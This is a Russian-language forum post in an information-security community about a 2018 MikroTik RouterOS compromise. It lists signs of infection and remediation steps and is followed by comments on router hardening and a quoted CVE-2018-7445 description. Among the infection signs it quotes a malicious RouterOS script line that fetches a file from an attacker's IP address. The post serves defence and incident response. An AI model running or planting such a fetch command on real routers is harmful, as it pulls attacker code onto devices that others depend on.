Уязвимости MikroTik

К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.


Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.


Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

Информационная безопасность IT

1.4K постов25.5K подписчиков

Добавить пост

Правила сообщества

Обязательно к прочтению для авторов:

1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".

Обязательно к прочтению для всех:

Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.


Запрещены политические holy wars.

По решению модератора или администратора сообщества пользователь будет забанен за:

1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.

2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.

3. За обвинение в киберпреступной деятельности.

4. За нарушение прочих Правил Пикабу.

Вы смотрите срез комментариев. Показать все
1
Автор поста оценил этот комментарий

Всего-то нужно было повесить на учётку админа ограничение по ip с которого можно подключится.

раскрыть ветку (18)
1
Автор поста оценил этот комментарий

нет, надо input рубить для внешки, и оставлять только свой ip. И порты можно поставить нестандартные

раскрыть ветку (14)
1
Автор поста оценил этот комментарий

Не надо ничего оставлять, просто поднять VPN сервер, все остальное с внешних интерфейсов резать.

раскрыть ветку (5)
Автор поста оценил этот комментарий

Свой ip лучше оставить, если vpn поломается

раскрыть ветку (4)
Автор поста оценил этот комментарий

Сейчас со "своим" ip совсем все плохо, Билайн даже серый не выдает, через NAT пускает. Если статика есть, то гуд, но лучше всего port knocking и vpn.

раскрыть ветку (3)
Автор поста оценил этот комментарий

Ну организация может себе статичный ip позволить, на крайняк сервер в облаке за 5 баксов в месяц

Автор поста оценил этот комментарий

Билайн даже серый не выдает,

ЕКБ, платная билайновская белая статика. но vpn все равно наше все, на своем поднял l2tp + ipsec

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

Жаба душит платить за воздух, настроил встроенный ddns, но Билайн частенько пускает через CGNAT, входящие подключения не работают совсем.

Автор поста оценил этот комментарий

Еще как вариант наружу выставлять только порт для ВПН. Например опен по сертификатам. А рулить только с внутренних интерфейсов.

Автор поста оценил этот комментарий

А разве ограничение не работает как элемент фаервола? Даже если допустим ты знаешь какой логин и пароль, то не залогиншся если твой ип другой.
ЗЫ, У меня один из микротов вообще весь трафик на свой внешний ип заварачивает в маскарад на нат в котором нет машин вообще. В итоге всегда тайм аут. Не то чтобы так было нужно, просто когда-то нат использовался. А теперь нет.

раскрыть ветку (6)
Автор поста оценил этот комментарий
нет, не как элемент фаервола, мы у себя проверяли. самый надёжный вариант - ограничить на инпут
Автор поста оценил этот комментарий

Хз, можно проверить nmap'ом, если порт с левого адреса открыт, то работает не так, как фаервол. Дыра может быть в реализации самого протокола, где знание учетки не потребуется.

раскрыть ветку (4)
Автор поста оценил этот комментарий

Конкретно эта бага в винбоксе в том что там логин и пароль не хранились в зашифрованном виде. Просто сливают базу и видят твой логин и пароль. И потом заходят как к себе домой. Новый фикс просто теперь шифрует данные. Потому сливать бесмысленно.

раскрыть ветку (3)
Автор поста оценил этот комментарий

я про общий случай

раскрыть ветку (2)
Автор поста оценил этот комментарий

Ну только если действительно найдут такую багу в протоколе, то возможно. Хотя что там ещё было связанно с ддосом при котором фаер не помогал. Ту багу помоему тоже оперативно пофиксили.

раскрыть ветку (1)
Автор поста оценил этот комментарий

например, CVE-2018-7445

A buffer overflow was found in the MikroTik RouterOS SMB service when processing NetBIOS session request messages. Remote attackers with access to the service can exploit this vulnerability and gain code execution on the system. The overflow occurs before authentication takes place, so it is possible for an unauthenticated remote attacker to exploit it.

2
DELETED
Автор поста оценил этот комментарий

и потом когда что-то сломается, а ты за миллион километров по 3g с телефона заходишь, лососнуть тунца.

раскрыть ветку (1)
1
Автор поста оценил этот комментарий

За 6 лет у меня ломался только внешний провайдер. Потому похеру где я и какой инет. А в локалке у меня есть машинка на линухе, через которую я и подключаюсь по необходимости из вне. Да и вообще в случае с РОС если его не трогать, то он работает и не ламается. А если ёкнется железо в любом случае решить проблему можно только присутсвуя лично.

Автор поста оценил этот комментарий
Как вариант я делал через AD и Radius. Права на полное редактирование только у основных сотрудников, поддержка сидит с read. Остальные лесом. Пока все норм
Вы смотрите срез комментариев. Чтобы написать комментарий, перейдите к общему списку